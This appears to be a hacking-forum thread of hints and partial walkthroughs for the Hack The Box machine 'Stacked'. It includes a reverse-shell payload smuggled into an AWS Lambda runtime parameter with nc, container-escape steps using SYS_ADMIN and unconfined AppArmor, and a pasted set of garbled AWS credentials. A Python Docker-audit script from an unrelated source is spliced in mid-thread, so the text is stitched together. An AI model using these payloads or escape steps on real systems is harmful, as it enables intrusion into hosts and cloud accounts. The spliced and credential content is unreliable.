TUTORIAL HTB Stacked [Discussion]
by pheonix2021 - September 18, 2021 at 06:09 PM
#73
(November 05, 2021 at 08:59 PM)gambit1337 Wrote:
(November 05, 2021 at 06:23 PM)gambit1337 Wrote: Anyone managed to escape out of container? Am not able to find any docker.sock file

nvm...... got root!!!!

I am not able to escape root container please help!
Reply
#74
(November 08, 2021 at 02:20 AM)whyshouldicare Wrote:
(November 05, 2021 at 08:59 PM)gambit1337 Wrote:
(November 05, 2021 at 06:23 PM)gambit1337 Wrote: Anyone managed to escape out of container? Am not able to find any docker.sock file

nvm...... got root!!!!

I am not able to escape root container please help!
I also tried some ways but didn't succeed?
Reply
#75
Any help after getting root on container?
Reply
#76
Guys, anyone have hints or a writeup for this machine?
Reply
#77
Though I changed the Referer to mail.stacked.htb, the website returns 302... Any hint?
Reply
#78
The docker socket is a tcp docker socket not a unix socket. To connect to 2376, you will need the certs in the container /root/.docker. Use the tcp docker socket to create a priv docker image and mount the image to the root path. Get a reverse shell from the new image, cd to the mount path to access the root folder.
Reply
#79
Been trying for hours the XSS, anyone has the ones that work so I can compare see what I am doing wrong? the links on the thread do not work anymore. thanks
Reply
#80
(November 25, 2021 at 05:57 AM)rebelon Wrote: Been trying for hours the XSS, anyone has the ones that work so I can compare see what I am doing wrong? the links on the thread do not work anymore. thanks

This works. Decode base64
Reply
#81
Thank you, someone already sent me the payload to bypass the WAF on the form; that is the piece I had trouble with. Thanks @faletemetal
Reply
#82
Got root flag.

=AWS credentials=
[default]
aws_access_key_id = 7Ec28H7TCuvgEK2a9xMsec2-user
aws_secret_access_key = )2gkbfeCd=F-JcxZ0MvFu{|m-Uu=J;xZ9]
aws_session_token = NEWTOKEN2021
Reply
#83
(November 14, 2021 at 06:49 AM)WillSmithRoger Wrote: The docker socket is a tcp docker socket not a unix socket. To connect to 2376, you will need the certs in the container /root/.docker. Use the tcp docker socket to create a priv docker image and mount the image to the root path. Get a reverse shell from the new image, cd to the mount path to access the root folder.

Can someone please expand on this? I am having difficulty creating a privileged image using the certs. A step-by-step process on how to do this would be really helpful.
(November 27, 2021 at 06:04 AM)lowkeylokii Wrote:
(November 14, 2021 at 06:49 AM)WillSmithRoger Wrote: The docker socket is a tcp docker socket not a unix socket. To connect to 2376, you will need the certs in the container /root/.docker. Use the tcp docker socket to create a priv docker image and mount the image to the root path. Get a reverse shell from the new image, cd to the mount path to access the root folder.

Can someone please expand on this? I am having difficulty creating a privileged image using the certs. A step-by-step process on how to do this would be really helpful.

Ok, so I finally broke out of the container:
Steps (After gaining root on Container):
1. build a new docker image downloading the following 2 files into your root directory https://github.com/tianon/docker-brew-ub...oot.tar.gz and https://github.com/tianon/docker-brew-ub...Dockerfile
> docker build Dockerfile
2. Find out your docker image ID with (will be the image with no repository or tag):
> docker images
3. run
> docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined <IMAGE ID> bash
4. Use POC 2 from https://github.com/carlospolop/hacktrick...ntainer.md
BAM, you will be root on the host machine.

Hit me up with some REP if this helped :)
Reply
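
For the defending side of posts #78 and #83, an added example (not code from the thread or from the box) that audits `docker inspect` JSON for the container settings those posts rely on: `--privileged`, `--cap-add=SYS_ADMIN`, `apparmor=unconfined`, and a bind mount of the host root. The sample inspect data and the function names are constructed for illustration.

```python
import json

# Constructed sample shaped like `docker inspect` output; not taken from the thread.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web", "HostConfig": {"Privileged": False, "CapAdd": None,
                                    "SecurityOpt": None, "Binds": ["/srv/www:/var/www:ro"]}},
    {"Name": "/build", "HostConfig": {"Privileged": False, "CapAdd": ["SYS_ADMIN"],
                                      "SecurityOpt": ["apparmor=unconfined"], "Binds": None}},
    {"Name": "/maint", "HostConfig": {"Privileged": True, "CapAdd": ["cap_net_admin"],
                                      "SecurityOpt": [], "Binds": ["/:/mnt"]}},
])

RISKY_CAPS = {"SYS_ADMIN", "ALL"}  # ALL includes SYS_ADMIN


def audit_container(container):
    """Return the list of risky settings found in one inspect object."""
    hc = container.get("HostConfig") or {}
    findings = []
    if hc.get("Privileged"):
        findings.append("privileged")
    # Capabilities may be written with or without the CAP_ prefix, in any case.
    caps = set()
    for cap in hc.get("CapAdd") or []:
        cap = cap.upper()
        caps.add(cap[4:] if cap.startswith("CAP_") else cap)
    findings += ["cap-add " + c for c in sorted(caps & RISKY_CAPS)]
    # Older clients wrote "apparmor:unconfined"; newer ones use "=".
    for opt in hc.get("SecurityOpt") or []:
        if opt.replace(":", "=", 1).lower() == "apparmor=unconfined":
            findings.append("apparmor=unconfined")
    # Bind syntax is "source:destination[:options]".
    for bind in hc.get("Binds") or []:
        parts = bind.split(":")
        if parts[0] == "/":
            findings.append("host / bind-mounted at " + (parts[1] if len(parts) > 1 else "?"))
    return findings


def audit(inspect_json):
    """Map container name -> findings, listing only containers with findings."""
    report = {}
    for container in json.loads(inspect_json):
        findings = audit_container(container)
        if findings:
            report[container.get("Name", "?").lstrip("/")] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_INSPECT).items():
        print(name + ": " + ", ".join(findings))
```

On a real host the input would be the output of `docker inspect` over the running container IDs; any client that holds the daemon's TLS client certificates can request these settings, so those certificates should not be stored inside a container.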
#84
(November 05, 2021 at 10:35 AM)phperl Wrote: for root create a lambda function:
aws --endpoint-url=http://localhost:4566 --region=us-east-1 lambda create-function --function-name=myFunction1 --runtime='python27$(nc 10.10.xx.xx xxxx -e /bin/sh)' --role=arn:aws:iam:local --handler=lambda.handler --zip-file=fileb://lambda.zip
aws --endpoint-url=http://localhost:4566 --region=us-east-1 lambda invoke --function-name=myFunction1 xxx

you will be in container root and can access docker socket. use the docker container privilege escalation method
I am doing this
bash-5.0$ aws --endpoint-url=http://localhost:4566 --region=us-east-1 lambda create-function --function-name=myFunction1 --runtime='python3$(nc 10.10.XX.XX xxxx -e /bin/sh)' --role=arn:aws:iam:local --handler=lambda.handler --zip-file=fileb://lambda.zip

And getting this error, please help, Thank You
Error parsing parameter '--zip-file': Unable to load paramfile fileb://lambda.zip: [Errno 2] No such file or directory: 'lambda.zip'
Reply
